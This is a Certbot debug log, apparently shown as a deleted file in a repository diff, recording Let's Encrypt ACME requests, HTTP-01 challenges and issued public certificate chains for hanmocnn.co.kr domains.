Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I
tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ
YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty
+VUwFj9tmWxyR/M=
-----END CERTIFICATE-----
2026-02-15 01:52:02,717:DEBUG:acme.client:Storing nonce: NeKnt8TGUmr5hRmt5v4kyV_zjaCxjD5GACGBv7voiKKjqOzNOfw
2026-02-15 01:52:02,717:DEBUG:acme.client:JWS payload:
b''
2026-02-15 01:52:02,722:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1VtcjVoUm10NXY0a3lWX3pqYUN4akQ1R0FDR0J2N3ZvaUtLanFPek5PZnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU0ZTM2ZTlmNDJhYWJhZjcwMzg3NDE4YjYyYWY5YjJhZTlhLzEifQ",
"signature": "aTci7u9FnehWBU47wxbqDk_wQMGYWTZ17fy0whShTkXp1gcAO8M_DnkNnOzHUZuuC1rSqMv-y3qHuxBBjJFkwx-Ho8YLu5mhyFCAQf46VOSeoTwz4DabP6Sr5OrJ-4PhtuPFdqr9ie1cZEGuzkYUSiCsjX-hdRJtw5cci1BR36DMELHIXKXGAml65MDbIcKHyxcvbtSxkW768HLeStjkzt60g3yay8TEj_WSHCYSAvHWrUBWFov_jefguOq31sKGu-fS5B-qiMbxBYo6E3ADP7qRVtvQ2QJXRAGBMXgr8UQTRmSK0buO7limyayfbOG-7CfrbUH9mw60pRfK4xyy0Q",
"payload": ""
}
2026-02-15 01:52:02,883:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1 HTTP/1.1" 200 2328
2026-02-15 01:52:02,884:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sun, 15 Feb 2026 01:52:02 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2328
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/0>;rel="alternate"
Replay-Nonce: NeKnt8TGzFhXu6tguKanBavnkUUb9vcvolh2BEjWZPFJHUOKePA
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDpTCCAyugAwIBAgISBU426fQqq69wOHQYtir5sq6aMAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
NzAeFw0yNjAyMTUwMDUzMjlaFw0yNjA1MTYwMDUzMjhaMB0xGzAZBgNVBAMTEmdp
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABN2QdXXnm5YK
FTKD1CtohVORW8CyhR1ivybS35nS4bs0EQ7UDEd6VeQOFvDViDbxVhHFnUR9kar9
LiMFnrEGWER3AnAhiGb2HBfnZsLGdYy4HvUUqP/pC3YS18me+eGn2aOCAhcwggIT
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
AjAAMB0GA1UdDgQWBBRaL2bTWA0MjQBBBgZygk0nxCro8jAfBgNVHSMEGDAWgBSu
SJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
Fmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
dHA6Ly9lNy5jLmxlbmNyLm9yZy8yNy5jcmwwggEFBgorBgEEAdZ5AgQCBIH2BIHz
APEAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxe/1qdAAAE
AwBIMEYCIQDwNplXasmzKSLIez7kR/jYwBmY+92fo0Oe9xTRW/LYwQIhALQ+kEkk
pUvSpkEcvMoHJVABdfGiHZZbWkgt7CSOPBySAHYAFoMtq/CpJQ8P8DqlRf/Iv8gj
0IdL9gQpJ/jnHzMT9foAAAGcXv9irwAABAMARzBFAiBKJHYXSD4GUqumXq5TLt3A
HS9ZM08kl/NzaSz0eNoTAgIhAMldLvgzn+UR9VyLT3n2KT6n82wIo035yLwnogk5
KY/lMAoGCCqGSM49BAMDA2gAMGUCMQDBWHS4t+nwA0lkvbQcsUqQq3uabapszHs1
ZVOVAO4J+Vfx3wgTRO8Dx8F33rBWndYCMGC0CN463ukm+NgQt/ByckZ2/rxaUm9S
AhNC3oI5CvlMIrXyWD67+cCSiTNiQIuD7A==
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL
MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo
IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN
MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j
cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/
vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF
HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw
DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS
BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA
gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm
MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww
CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu
b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX
lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb
Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf
-----END CERTIFICATE-----
2026-02-15 01:52:02,884:DEBUG:acme.client:Storing nonce: NeKnt8TGzFhXu6tguKanBavnkUUb9vcvolh2BEjWZPFJHUOKePA
2026-02-15 01:52:02,885:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-6.
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-6.
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-6/cert.pem.
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-6/privkey.pem.
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-6/chain.pem.
2026-02-15 01:52:02,901:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-6/fullchain.pem.
2026-02-15 01:52:02,901:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-6/README.
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
2026-02-15 01:52:02,913:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-15 01:52:02,913:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-15 01:52:02,913:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
2026-02-15 01:52:02,913:DEBUG:certbot.configuration:Var webroot_map={'git.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user:
Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/npm-6/fullchain.pem
Key is saved at: /etc/letsencrypt/live/npm-6/privkey.pem
This certificate expires on 2026-05-16.
These files will be updated when the certificate renews.
2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
2026-02-15 01:52:02,919:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
* Donating to EFF: https://eff.org/donate-le

View File

@@ -1,629 +0,0 @@
2026-02-14 23:56:03,849:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-5', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'hanmocnn.co.kr,www.hanmocnn.co.kr']
2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-14 23:56:03,865:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-14 23:56:03,866:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 23:56:03,866:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffff8e7a5590>
Prep: True
2026-02-14 23:56:03,867:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffff8e7a5590> and installer None
2026-02-14 23:56:03,867:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
2026-02-14 23:56:04,100:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
2026-02-14 23:56:04,101:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-14 23:56:04,106:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-14 23:56:04,633:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-14 23:56:04,634:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:04 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"Gc3gBymDyPY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-14 23:56:04,635:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for hanmocnn.co.kr and www.hanmocnn.co.kr
2026-02-14 23:56:04,655:DEBUG:acme.client:Requesting fresh nonce
2026-02-14 23:56:04,655:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-14 23:56:04,815:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-14 23:56:04,816:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:04 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: NeKnt8TGestOb4Fc1JYyinutgiAntZDFY_yp1ktjxi2tcT3bfYw
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-14 23:56:04,816:DEBUG:acme.client:Storing nonce: NeKnt8TGestOb4Fc1JYyinutgiAntZDFY_yp1ktjxi2tcT3bfYw
2026-02-14 23:56:04,817:DEBUG:acme.client:JWS payload:
b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "hanmocnn.co.kr"\n },\n {\n "type": "dns",\n "value": "www.hanmocnn.co.kr"\n }\n ]\n}'
2026-02-14 23:56:04,823:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2VzdE9iNEZjMUpZeWludXRnaUFudFpERllfeXAxa3RqeGkydGNUM2JmWXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9",
"signature": "juewpbMaBZNaMfU9dqjamSNFoI-PzgktmhJyw43wSZ5OThiGI7N6iTuEJBKZ8hLFW6fcOzQP3cToFaJrtCwOKxu7KXy1k3wCleq6z99OtmHXACZHsaPrPZ-mXMicz8e1vS-6h1oR2zg94g-gHelbWesHEb6M60Rn8EjK4DFm8SvIaFwBquEsLFRrekm0fwYNqohUGgTCL7abdUes9Yw_6siofGMzU0fMcXRA_s114rGwFAPQ-6jqqWNwlYVgBGY--3BEl3OwwZ0-pQOSnc7t8_rU5e6JZr_hDSU_0zogGuAsuy644cQMsa-_nSx92ZTmPX_XzRxS7YGDBajbXMi_Ow",
"payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImhhbm1vY25uLmNvLmtyIgogICAgfSwKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInd3dy5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0"
}
2026-02-14 23:56:05,027:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 497
2026-02-14 23:56:05,028:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sat, 14 Feb 2026 23:56:04 GMT
Content-Type: application/json
Content-Length: 497
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480375535806
Replay-Nonce: 4AH-2vvBT2vTYIMOrxGiTtOKUqEylQbuZuNcckoFVLrqiF3jx9Y
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "pending",
"expires": "2026-02-21T23:56:04Z",
"identifiers": [
{
"type": "dns",
"value": "hanmocnn.co.kr"
},
{
"type": "dns",
"value": "www.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386",
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480375535806"
}
2026-02-14 23:56:05,028:DEBUG:acme.client:Storing nonce: 4AH-2vvBT2vTYIMOrxGiTtOKUqEylQbuZuNcckoFVLrqiF3jx9Y
2026-02-14 23:56:05,028:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:05,033:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QlQydlRZSU1PcnhHaVR0T0tVcUV5bFFidVp1TmNja29GVkxycWlGM2p4OVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzYzODY0Mzg2In0",
"signature": "pbWBe85DpxKfn_lPIjFwvF1jfmQ4abuYD0ndP5kNoZ5TLTUhA31C3vEuxlsovLJgyC8Ulmm7Bgx4WeyEMT6qjtxhy9j5Kykk-7wRszhAuRdyz-lsifs8J9-yxoE3C9IkglmljKeTmW_ApNEwwjaT2byaaET9vIIJsabfromIWewPAYdSfzbqDPlEk3nZyH9rtfOFhz8Rj3-v0OjT_asvc8pwOrVjGO3gOtLQG4K0eZHiE555xsZvZB__-F9hPs0ZYFPlglrDTqw5XKJQo7ufYSZainTqGIGWUX-jVz1WgQRstGfQr6VwhH0oc1EekFl95l_MtKq18gcmO_D6BJpLdQ",
"payload": ""
}
2026-02-14 23:56:05,197:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658763864386 HTTP/1.1" 200 777
2026-02-14 23:56:05,198:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:05 GMT
Content-Type: application/json
Content-Length: 777
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvBHbnqIb9LyBaA8P9msdY-ehXuVEPrNk20KbauKrGshqo
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "www.hanmocnn.co.kr"
},
"status": "valid",
"expires": "2026-03-16T22:37:07Z",
"challenges": [
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658763864386/WorYEw",
"status": "valid",
"validated": "2026-02-14T22:37:00Z",
"token": "wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
"validationRecord": [
{
"url": "http://www.hanmocnn.co.kr/.well-known/acme-challenge/wp-HSjbr4Fy8FC9IwwKqKWcz8k66yXQtla_0042joNo",
"hostname": "www.hanmocnn.co.kr",
"port": "80",
"addressesResolved": [
"222.117.41.51"
],
"addressUsed": "222.117.41.51"
}
]
}
]
}
2026-02-14 23:56:05,198:DEBUG:acme.client:Storing nonce: 4AH-2vvBHbnqIb9LyBaA8P9msdY-ehXuVEPrNk20KbauKrGshqo
2026-02-14 23:56:05,198:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:05,203:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkhibnFJYjlMeUJhQThQOW1zZFktZWhYdVZFUHJOazIwS2JhdUtyR3NocW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0",
"signature": "tz2Y086S4EaArR69HbUgLQD_29PSdN1N-KFP_-oLruFKzk-JHDDAYfdH-AhNXZY_hJFO-aW3WedTTy2ZCbIY6193cKJZuK0iNdJPPRRRhXS4anYzhvVqZrtsgM963naPim51-HwmIE1jo2ESDQGYk-0sMk4AnLsDtUFqk_uO8iRIFPKfX2Hk7-rzb8-ctq01lnHQ_GGpAbftWCd8OCOsaKmsDKe1AWAF3pMEi9Na7FnaNiQRO-JhDfj_HnAfJSP5B4oqh_ty71CP5OosPD1sb52-ROrEnHJWK5HCJt9t-1quhiKWFBfmBJ3FNCU4f8-aGyu7tdKxa6ta6ZEBk9HyUA",
"payload": ""
}
2026-02-14 23:56:05,367:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822
2026-02-14 23:56:05,368:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:05 GMT
Content-Type: application/json
Content-Length: 822
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: 4AH-2vvBzHJaud8ZfhX0LUR1BTrdy4GJ8sNj5NkVg96bgxLtfuY
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"identifier": {
"type": "dns",
"value": "hanmocnn.co.kr"
},
"status": "pending",
"expires": "2026-02-21T23:56:04Z",
"challenges": [
{
"type": "dns-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
},
{
"type": "tls-alpn-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
}
]
}
2026-02-14 23:56:05,368:DEBUG:acme.client:Storing nonce: 4AH-2vvBzHJaud8ZfhX0LUR1BTrdy4GJ8sNj5NkVg96bgxLtfuY
2026-02-14 23:56:05,368:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'}
2026-02-14 23:56:05,369:INFO:certbot._internal.auth_handler:Performing the following challenges:
2026-02-14 23:56:05,369:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='hanmocnn.co.kr')
2026-02-14 23:56:05,369:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
2026-02-14 23:56:05,369:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
2026-02-14 23:56:05,371:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0
2026-02-14 23:56:05,372:DEBUG:acme.client:JWS payload:
b'{}'
2026-02-14 23:56:05,376:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QnpISmF1ZDhaZmhYMExVUjFCVHJkeTRHSjhzTmo1TmtWZzk2Ymd4THRmdVkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2L1JNeEFBZyJ9",
"signature": "Ov4Fc1fM9a-2y12yEwh75oXuYp87xbKqQ_cGIG7P63r6MjbmmuLeZd5COLBfgrgjNJRgAOr1M32zNEdJWnZULT3cH-xGb6uipmCh3kN3Pdhqskbi4yUfkk16cI8zs9Lf5iPEK6PxhdBWxNA_-xY8zVqFVJTBGsliXxmGSGUJaRPWKFuZHutJRv66gHOJeLGcaVUbAbpOPGPRFh-0IsPc0yZqj-wN7BZwemY2b9x_WboVK7M2GeJwp8UAWDNzX0i7vwrOCYbqs8Eek4nNAd9xwpJUOCR8Y2dMRuZ9_KLJ92p7FlK1P5-dkOxMwpm4-Ss4UkYCTPsa37P8cptqoNeUaw",
"payload": "e30"
}
2026-02-14 23:56:05,542:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658791959956/RMxAAg HTTP/1.1" 200 195
2026-02-14 23:56:05,543:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 23:56:05 GMT
Content-Type: application/json
Content-Length: 195
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956>;rel="up"
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg
Replay-Nonce: 4AH-2vvBjNLPyColdbElV57vl1FNhl30mNx5o-RvY8R6PJo2R68
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"type": "http-01",
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg",
"status": "pending",
"token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0"
}
2026-02-14 23:56:05,543:DEBUG:acme.client:Storing nonce: 4AH-2vvBjNLPyColdbElV57vl1FNhl30mNx5o-RvY8R6PJo2R68
2026-02-14 23:56:05,544:INFO:certbot._internal.auth_handler:Waiting for verification...
2026-02-14 23:56:06,544:DEBUG:acme.client:JWS payload:
b''
2026-02-14 23:56:06,549:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386:
{
